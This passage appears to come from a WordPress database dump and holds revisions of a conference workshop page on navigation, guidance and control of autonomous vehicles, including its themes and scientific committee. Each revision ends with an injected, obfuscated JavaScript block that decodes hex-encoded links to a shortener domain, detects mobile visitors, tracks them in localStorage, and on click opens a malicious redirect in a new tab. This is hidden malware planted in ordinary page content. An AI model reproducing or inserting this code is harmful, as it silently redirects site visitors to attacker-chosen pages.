wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles','','inherit','closed','closed','','2856-revision-v1','','','2023-03-03 17:23:21','2023-03-03 17:23:21','',2856,'https://gsw2023.com/?p=3925',0,'revision','',0),
(3926,1,'2023-03-03 17:24:00','2023-03-03 17:24:00','<p>[vc_row][vc_column width=\"2/3\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles</strong></span></h5>\n<h5></h5>\n<h5><strong>Scope:</strong></h5>\n<h5><strong>Integrated Wireless, Multi-Sensor, Multi-Perception Systems for High-Precision Positioning, Guidance and Control of Autonomous Vehicles</strong></h5>\n<p>[/vc_column_text][vc_column_text]</p>\n<h6 style=\"text-align: justify; color: black;\"><strong>Autonomous vehicles (AVs) promise to enhance safety, reduce emissions, and improve transportation system efficiency and reliability. The growing demand for AVs is shaping the future of the automotive industry by transforming the in-vehicle experience and paving the way for large-scale implementation of autonomous driving. The positioning, guidance, and control technologies for future Avs are rapidly advancing. They require on onboard intelligence relying on a suite of sensors and systems such as global navigation satellite systems (GNSS) receivers, mmWave wireless technology (5G/6G), vehicle motion sensors and remote sensing systems including cameras, light detection and ranging (LiDAR) and radar. AVs that can sense the environment and navigating without human input require robust advanced positioning, navigation, and guidance for efficient operation in all environments and weather conditions. The availability of the above sensors and systems in future AVs provides an attractive opportunity to advance the robustness and safety of autonomous driving. This workshop will seek original contributions covering advanced topics related to the state of the art and future trends of positioning and mapping as well as control and guidance technologies for autonomous vehicles and future self-driving.</strong></h6>\n<h6><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h6>\n<p>.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2857\" img_size=\"600x400\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIRS</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"53\"][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>GNSS based high precision positioning in challenging urban environments.</strong></h6>\n</li>\n<li>\n<h6><strong>New wireless technologies and methods for AV connectivity, cooperative perception, positioning, and path planning.</strong></h6>\n</li>\n<li>\n<h6><strong>Recent technical advances in perception systems meeting the growing AV demands.</strong></h6>\n</li>\n<li>\n<h6><strong>Advanced AI-based multi-system fusion for positioning, mapping, and guidance.</strong></h6>\n</li>\n<li>\n<h6><strong>Machine-learning based object identification, classification, and mapping.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative self-Localization and mapping (SLAM).</strong></h6>\n</li>\n<li>\n<h6><strong>Control of AVs and mobile robots.</strong></h6>\n</li>\n<li>\n<h6><strong>Communication schemes for multiple AVs.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovations in other autonomous systems (UAVs, UGVs, and drones)</strong></h6>\n</li>\n<li>\n<h6><strong>Applications of AVs.</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<p>&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td width=\"158\">Cairo Lúcio Nascimento Junior</td>\n<td width=\"267\">Professor, ITA, Brazil</td>\n</tr>\n<tr>\n<td width=\"158\">Mohamed Tamazin</td>\n<td width=\"267\">Senior GNSS Architect, Safran Navigation and Timing</td>\n</tr>\n<tr>\n<td width=\"158\">Paul Hershey</td>\n<td width=\"267\">Principal Engineering Fellow, Raytheon, USA</td>\n</tr>\n<tr>\n<td width=\"158\">Mohamed Elhabiby</td>\n<td width=\"267\">CEO, Micro Engineering Technologies Inc.</td>\n</tr>\n<tr>\n<td width=\"158\">Caroline Channel</td>\n<td width=\"267\">Professor, ISAE-Supaero, France</td>\n</tr>\n<tr>\n<td width=\"158\">Ashraf Abosekeen</td>\n<td width=\"267\">Assistant Professor, Military Technical College, Cairo, Egypt.</td>\n</tr>\n<tr>\n<td width=\"158\">Umar Iqbal</td>\n<td width=\"267\">Associate Professor, Mississippi State University, USA</td>\n</tr>\n<tr>\n<td width=\"158\">Amr Elwakeel</td>\n<td width=\"267\">Assistant Professor, University of Western Virginia, USA</td>\n</tr>\n<tr>\n<td width=\"158\">Peter Travis Jardine</td>\n<td width=\"267\">Adjunct Professor, Royal Military College of Canada, ON, Canada</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles','','inherit','closed','closed','','2856-revision-v1','','','2023-03-03 17:24:00','2023-03-03 17:24:00','',2856,'https://gsw2023.com/?p=3926',0,'revision','',0),
(3927,1,'2023-03-03 17:25:40','2023-03-03 17:25:40','<p>[vc_row][vc_column width=\"2/3\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles</strong></span></h5>\n<h5></h5>\n<h5><strong>Scope:</strong></h5>\n<h5><strong>Integrated Wireless, Multi-Sensor, Multi-Perception Systems for High-Precision Positioning, Guidance and Control of Autonomous Vehicles</strong></h5>\n<p>[/vc_column_text][vc_column_text]</p>\n<h6 style=\"text-align: justify; color: black;\"><strong>Autonomous vehicles (AVs) promise to enhance safety, reduce emissions, and improve transportation system efficiency and reliability. The growing demand for AVs is shaping the future of the automotive industry by transforming the in-vehicle experience and paving the way for large-scale implementation of autonomous driving. The positioning, guidance, and control technologies for future Avs are rapidly advancing. They require on onboard intelligence relying on a suite of sensors and systems such as global navigation satellite systems (GNSS) receivers, mmWave wireless technology (5G/6G), vehicle motion sensors and remote sensing systems including cameras, light detection and ranging (LiDAR) and radar. AVs that can sense the environment and navigating without human input require robust advanced positioning, navigation, and guidance for efficient operation in all environments and weather conditions. The availability of the above sensors and systems in future AVs provides an attractive opportunity to advance the robustness and safety of autonomous driving. This workshop will seek original contributions covering advanced topics related to the state of the art and future trends of positioning and mapping as well as control and guidance technologies for autonomous vehicles and future self-driving.</strong></h6>\n<h6><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h6>\n<p>.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2857\" img_size=\"600x400\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIRS</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"53\"][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>GNSS based high precision positioning in challenging urban environments.</strong></h6>\n</li>\n<li>\n<h6><strong>New wireless technologies and methods for AV connectivity, cooperative perception, positioning, and path planning.</strong></h6>\n</li>\n<li>\n<h6><strong>Recent technical advances in perception systems meeting the growing AV demands.</strong></h6>\n</li>\n<li>\n<h6><strong>Advanced AI-based multi-system fusion for positioning, mapping, and guidance.</strong></h6>\n</li>\n<li>\n<h6><strong>Machine-learning based object identification, classification, and mapping.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative self-Localization and mapping (SLAM).</strong></h6>\n</li>\n<li>\n<h6><strong>Control of AVs and mobile robots.</strong></h6>\n</li>\n<li>\n<h6><strong>Communication schemes for multiple AVs.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovations in other autonomous systems (UAVs, UGVs, and drones)</strong></h6>\n</li>\n<li>\n<h6><strong>Applications of AVs.</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<table>\n<tbody>\n<tr>\n<td width=\"158\">Cairo Lúcio Nascimento Junior</td>\n<td width=\"267\">Professor, ITA, Brazil</td>\n</tr>\n<tr>\n<td width=\"158\">Mohamed Tamazin</td>\n<td width=\"267\">Senior GNSS Architect, Safran Navigation and Timing</td>\n</tr>\n<tr>\n<td width=\"158\">Paul Hershey</td>\n<td width=\"267\">Principal Engineering Fellow, Raytheon, USA</td>\n</tr>\n<tr>\n<td width=\"158\">Mohamed Elhabiby</td>\n<td width=\"267\">CEO, Micro Engineering Technologies Inc.</td>\n</tr>\n<tr>\n<td width=\"158\">Caroline Channel</td>\n<td width=\"267\">Professor, ISAE-Supaero, France</td>\n</tr>\n<tr>\n<td width=\"158\">Ashraf Abosekeen</td>\n<td width=\"267\">Assistant Professor, Military Technical College, Cairo, Egypt.</td>\n</tr>\n<tr>\n<td width=\"158\">Umar Iqbal</td>\n<td width=\"267\">Associate Professor, Mississippi State University, USA</td>\n</tr>\n<tr>\n<td width=\"158\">Amr Elwakeel</td>\n<td width=\"267\">Assistant Professor, University of Western Virginia, USA</td>\n</tr>\n<tr>\n<td width=\"158\">Peter Travis Jardine</td>\n<td width=\"267\">Adjunct Professor, Royal Military College of Canada, ON, Canada</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 